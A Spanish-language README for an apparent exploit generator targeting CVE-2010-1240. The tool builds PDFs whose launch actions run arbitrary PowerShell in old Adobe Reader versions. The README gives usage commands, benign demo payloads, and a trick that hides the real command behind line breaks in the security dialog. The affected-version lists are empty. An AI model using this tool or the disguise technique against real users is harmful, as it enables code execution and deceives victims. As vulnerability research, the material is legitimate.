
Herramienta Python para la investigación de CVE-2010-1240 - genera PDFs maliciosos que explotan las acciones de lanzamiento de Adobe Reader
Herramienta de investigación educativa que demuestra la vulnerabilidad CVE-2010-1240 en Adobe Reader a través de acciones de lanzamiento de PDF maliciosas.
Esta herramienta se crea estrictamente con fines educativos e investigación de seguridad para demostrar la vulnerabilidad CVE-2010-1240. Solo debe utilizarse en entornos controlados para aprender sobre mecanismos de seguridad de PDF e investigación de vulnerabilidades.
No utilice esta herramienta con fines maliciosos.
Este proyecto demuestra CVE-2010-1240, una vulnerabilidad crítica en Adobe Reader que permite la ejecución de código arbitrario a través de acciones de lanzamiento de PDF maliciosas. La vulnerabilidad afecta a versiones de Adobe Reader y Acrobat anteriores a 9.3.3 y 8.2.3.
git clone https://github.com/12345qwert123456/cve-2010-1240.git
cd cve-2010-1240
# Crear un PDF de demostración básico de CVE-2010-1240
python pdf_generator.py
# Crear PDF con carga útil personalizada de PowerShell
python pdf_generator.py -c "Write-Host 'CVE-2010-1240 Demo'; pause"
# Especificar nombre de archivo de salida
python pdf_generator.py -o cve_demo.pdf
Cuando se abre un PDF malicioso en versiones vulnerables de Adobe Reader, la acción de lanzamiento activa un cuadro de diálogo de seguridad:

La advertencia de seguridad de Adobe Reader que muestra la acción de lanzamiento intentando ejecutar PowerShell
Después de omitir el cuadro de diálogo de seguridad, el exploit de CVE-2010-1240 ejecuta exitosamente la carga útil de PowerShell:

Ventana de PowerShell abierta por el exploit de acción de lanzamiento de PDF que muestra la ejecución exitosa de código
Los atacantes avanzados pueden usar saltos de línea y formato para disfrazar el comando real que se está ejecutando:

Demostración de cómo los atacantes pueden manipular el cuadro de diálogo de acción de lanzamiento para mostrar texto benigno mientras ejecutan comandos maliciosos
Esta técnica explota la psicología del usuario al mostrar texto inocuo en el diálogo mientras el comando malicioso real está oculto mediante un formato cuidadoso y saltos de línea.
Ejemplo de carga útil:
pdf_generator.py -o poc.pdf -c "Write-Host \"'CVE-2010-1240 PoC'; pause\"\n\n\n\n\n\n\n# Press Open Button"
usage: pdf_generator.py [-h] [-o OUTPUT] [-c COMMAND]
CVE-2010-1240 PDF Launch Action Research Tool
options:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output PDF filename (default: cve_2010_1240_demo.pdf)
-c COMMAND, --command COMMAND
PowerShell command to execute
CVE-2010-1240 es una vulnerabilidad crítica que afecta a Adobe Reader y Acrobat a través del manejo inadecuado de las acciones de lanzamiento en documentos PDF. La vulnerabilidad permite a atacantes remotos ejecutar código arbitrario mediante la creación de archivos PDF maliciosos que abusan del mecanismo de acción de lanzamiento.
El PDF generado explota CVE-2010-1240 a través de:
❌ Vulnerables:
✅ Parcheadas: